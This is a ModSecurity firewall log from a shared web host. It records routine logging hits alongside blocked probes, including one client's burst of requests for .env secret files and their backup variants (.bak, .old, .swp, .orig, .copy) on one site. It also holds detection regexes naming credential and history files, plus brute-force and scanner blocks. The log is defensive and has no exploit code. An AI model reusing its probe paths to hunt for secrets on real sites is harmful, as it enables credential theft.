[Tue May 26 14:59:03.592142 2026] [security2:error] [pid 658374:tid 658515] [client 154.161.32.97:57082] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVn351Mb7_aby-E0KdEWgAAAAs"]
[Tue May 26 14:59:04.178193 2026] [security2:error] [pid 658374:tid 658603] [client 41.220.131.195:49262] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "nicmaperu.com"] [uri "/wp-comments-post.php"] [unique_id "ahVn351Mb7_aby-E0KdEZQAAAGM"]
[Tue May 26 14:59:05.426760 2026] [security2:error] [pid 658374:tid 658564] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn4Z1Mb7_aby-E0KdEdgAAADw"]
[Tue May 26 14:59:05.465283 2026] [security2:error] [pid 658374:tid 658603] [client 41.220.131.195:49262] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "nicmaperu.com"] [uri "/wp-comments-post.php"] [unique_id "ahVn351Mb7_aby-E0KdEZQAAAGM"]
[Tue May 26 14:59:05.465322 2026] [security2:error] [pid 658374:tid 658603] [client 41.220.131.195:49262] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "nicmaperu.com"] [uri "/wp-comments-post.php"] [unique_id "ahVn351Mb7_aby-E0KdEZQAAAGM"]
[Tue May 26 14:59:07.036173 2026] [security2:error] [pid 662057:tid 662182] [remote 152.53.111.131:34660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.111.53.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVn4vT3lMm9tGFVg9RYrwABIHw"]
[Tue May 26 14:59:07.670721 2026] [security2:error] [pid 658374:tid 658625] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn451Mb7_aby-E0KdEpgAAAHk"]
[Tue May 26 14:59:07.969969 2026] [security2:error] [pid 662057:tid 662130] [remote 95.216.117.13:45556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVn4_T3lMm9tGFVg9RYswABfUg"]
[Tue May 26 14:59:09.466995 2026] [security2:error] [pid 658374:tid 658628] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn5Z1Mb7_aby-E0KdEyQAAAHw"]
[Tue May 26 14:59:11.811249 2026] [security2:error] [pid 662057:tid 662307] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn5_T3lMm9tGFVg9RY1AAAAYI"]
[Tue May 26 14:59:12.120817 2026] [security2:error] [pid 658374:tid 658595] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVn6J1Mb7_aby-E0KdE_gAAAFs"], referer: https://www.anujtradingco.com/
[Tue May 26 14:59:12.898151 2026] [security2:error] [pid 658374:tid 658538] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVn6J1Mb7_aby-E0KdFEwAAACI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1285318&moderation-hash=ebe2c4156d943d51100e8ea3501d2963
[Tue May 26 14:59:13.438112 2026] [security2:error] [pid 658374:tid 658551] [client 185.179.29.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahVn5p1Mb7_aby-E0KdE5QAALwY"]
[Tue May 26 14:59:14.524951 2026] [security2:error] [pid 658374:tid 658590] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn6p1Mb7_aby-E0KdFLgAAAFY"]
[Tue May 26 14:59:16.742339 2026] [security2:error] [pid 658374:tid 658605] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn7J1Mb7_aby-E0KdFbAAAAGU"]
[Tue May 26 14:59:16.844252 2026] [security2:error] [pid 662057:tid 662233] [client 172.225.181.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVn6_T3lMm9tGFVg9RY9QAAATg"]
[Tue May 26 14:59:19.027609 2026] [security2:error] [pid 662057:tid 662234] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn7vT3lMm9tGFVg9RZBgAAATk"]
[Tue May 26 14:59:20.511356 2026] [security2:error] [pid 658374:tid 658523] [client 185.166.162.107:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVn8J1Mb7_aby-E0KdF9wAAABM"], referer: http://anujtradingco.com/homepages/portfolio-photo/
[Tue May 26 14:59:20.705454 2026] [security2:error] [pid 658374:tid 658550] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn8J1Mb7_aby-E0KdF7QAAAC4"]
[Tue May 26 14:59:21.333970 2026] [security2:error] [pid 658374:tid 658473] [remote 223.185.40.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVn8J1Mb7_aby-E0KdGBQAAIGI"]
[Tue May 26 14:59:23.030068 2026] [security2:error] [pid 658374:tid 658629] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn8p1Mb7_aby-E0KdGPwAAAH0"]
[Tue May 26 14:59:24.778683 2026] [security2:error] [pid 662057:tid 662202] [client 114.119.137.103:57577] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "blog.jhonweb.com"] [uri "/robots.txt"] [unique_id "ahVn9PT3lMm9tGFVg9RZMQAAARk"]
[Tue May 26 14:59:24.784831 2026] [security2:error] [pid 662057:tid 662313] [client 85.208.96.200:54710] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVn9PT3lMm9tGFVg9RZMwAAAYg"]
[Tue May 26 14:59:24.785000 2026] [security2:error] [pid 662057:tid 662313] [client 85.208.96.200:54710] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVn9PT3lMm9tGFVg9RZMwAAAYg"]
[Tue May 26 14:59:25.840269 2026] [security2:error] [pid 662057:tid 662281] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn9fT3lMm9tGFVg9RZNwAAAWg"]
[Tue May 26 14:59:28.059592 2026] [security2:error] [pid 658374:tid 658596] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn951Mb7_aby-E0KdG3QAAAFw"]
[Tue May 26 14:59:28.996187 2026] [security2:error] [pid 658374:tid 658582] [client 42.118.42.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn-J1Mb7_aby-E0KdG_QAAAE4"]
[Tue May 26 14:59:29.881822 2026] [security2:error] [pid 658374:tid 658578] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn-Z1Mb7_aby-E0KdHIAAAAEo"]
[Tue May 26 14:59:30.603453 2026] [security2:error] [pid 658374:tid 658437] [remote 74.7.241.58:60864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVn-p1Mb7_aby-E0KdHPgAAfz4"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/sv
[Tue May 26 14:59:32.009382 2026] [security2:error] [pid 658374:tid 658575] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn-51Mb7_aby-E0KdHWwAAAEc"]
[Tue May 26 14:59:34.112717 2026] [security2:error] [pid 658374:tid 658564] [client 208.84.100.50:46086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env"] [unique_id "ahVn_p1Mb7_aby-E0KdHjQAAADw"]
[Tue May 26 14:59:34.114888 2026] [security2:error] [pid 658374:tid 658571] [client 208.84.100.50:45862] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/backend/.env"] [unique_id "ahVn_p1Mb7_aby-E0KdHmwAAAEM"]
[Tue May 26 14:59:34.115635 2026] [security2:error] [pid 662057:tid 662233] [client 208.84.100.50:45838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/app/.env"] [unique_id "ahVn_vT3lMm9tGFVg9RZcQAAATg"]
[Tue May 26 14:59:34.116098 2026] [security2:error] [pid 658374:tid 658519] [client 208.84.100.50:45846] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/api/.env"] [unique_id "ahVn_p1Mb7_aby-E0KdHngAAAA8"]
[Tue May 26 14:59:34.846608 2026] [security2:error] [pid 662057:tid 662245] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVn_vT3lMm9tGFVg9RZdgAAAUQ"]
[Tue May 26 14:59:35.407516 2026] [security2:error] [pid 658374:tid 658439] [remote 57.141.2.69:52719] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVn_51Mb7_aby-E0KdHuwAAJ0A"]
[Tue May 26 14:59:36.573676 2026] [security2:error] [pid 662057:tid 662210] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoAPT3lMm9tGFVg9RZjwAAASE"]
[Tue May 26 14:59:36.616839 2026] [security2:error] [pid 662057:tid 662303] [client 114.119.156.165:25751] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVoAPT3lMm9tGFVg9RZlgAAAX4"], referer: https://glorodavionics.com/
[Tue May 26 14:59:36.697707 2026] [security2:error] [pid 662057:tid 662261] [client 151.245.166.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVoAPT3lMm9tGFVg9RZmAAAAVQ"], referer: http://anujtradingco.com/
[Tue May 26 14:59:37.322057 2026] [security2:error] [pid 658374:tid 658591] [client 208.84.100.50:45964] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.production.copy"] [unique_id "ahVoAZ1Mb7_aby-E0KdH2AAAAFc"]
[Tue May 26 14:59:38.608947 2026] [security2:error] [pid 662057:tid 662242] [client 208.84.100.50:46028] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.bak"] [unique_id "ahVoAvT3lMm9tGFVg9RZuwAAAUE"]
[Tue May 26 14:59:38.609221 2026] [security2:error] [pid 662057:tid 662304] [client 208.84.100.50:46218] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.local.old"] [unique_id "ahVoAvT3lMm9tGFVg9RZvgAAAX8"]
[Tue May 26 14:59:38.609325 2026] [security2:error] [pid 662057:tid 662312] [client 208.84.100.50:46342] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.production.swp"] [unique_id "ahVoAvT3lMm9tGFVg9RZvAAAAYc"]
[Tue May 26 14:59:38.609778 2026] [security2:error] [pid 662057:tid 662239] [client 208.84.100.50:46308] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.production.old"] [unique_id "ahVoAvT3lMm9tGFVg9RZwAAAAT4"]
[Tue May 26 14:59:38.609880 2026] [security2:error] [pid 662057:tid 662264] [client 208.84.100.50:46270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.local.swp"] [unique_id "ahVoAvT3lMm9tGFVg9RZxgAAAVc"]
[Tue May 26 14:59:38.610053 2026] [security2:error] [pid 662057:tid 662208] [client 208.84.100.50:46306] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.production.bak"] [unique_id "ahVoAvT3lMm9tGFVg9RZxQAAAR8"]
[Tue May 26 14:59:38.610169 2026] [security2:error] [pid 658374:tid 658528] [client 208.84.100.50:46196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.copy"] [unique_id "ahVoAp1Mb7_aby-E0KdH8gAAABg"]
[Tue May 26 14:59:38.610285 2026] [security2:error] [pid 662057:tid 662189] [client 208.84.100.50:46184] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.orig"] [unique_id "ahVoAvT3lMm9tGFVg9RZvwAAAQw"]
[Tue May 26 14:59:38.610615 2026] [security2:error] [pid 662057:tid 662252] [client 208.84.100.50:46176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.swp"] [unique_id "ahVoAvT3lMm9tGFVg9RZwwAAAUs"]
[Tue May 26 14:59:38.610921 2026] [security2:error] [pid 662057:tid 662280] [client 208.84.100.50:46282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.local.orig"] [unique_id "ahVoAvT3lMm9tGFVg9RZwgAAAWc"]
[Tue May 26 14:59:38.611182 2026] [security2:error] [pid 662057:tid 662272] [client 208.84.100.50:46346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.production.orig"] [unique_id "ahVoAvT3lMm9tGFVg9RZvQAAAV8"]
[Tue May 26 14:59:38.611259 2026] [security2:error] [pid 662057:tid 662228] [client 208.84.100.50:46294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.local.copy"] [unique_id "ahVoAvT3lMm9tGFVg9RZxAAAATM"]
[Tue May 26 14:59:38.611455 2026] [security2:error] [pid 662057:tid 662307] [client 208.84.100.50:46140] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.backup"] [unique_id "ahVoAvT3lMm9tGFVg9RZyQAAAYI"]
[Tue May 26 14:59:38.612262 2026] [security2:error] [pid 662057:tid 662237] [client 208.84.100.50:46162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env~"] [unique_id "ahVoAvT3lMm9tGFVg9RZygAAATw"]
[Tue May 26 14:59:38.613963 2026] [security2:error] [pid 662057:tid 662257] [client 208.84.100.50:46324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.production.backup"] [unique_id "ahVoAvT3lMm9tGFVg9RZzwAAAVA"]
[Tue May 26 14:59:38.614146 2026] [security2:error] [pid 662057:tid 662224] [client 208.84.100.50:46212] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.local.bak"] [unique_id "ahVoAvT3lMm9tGFVg9RZzQAAAS8"]
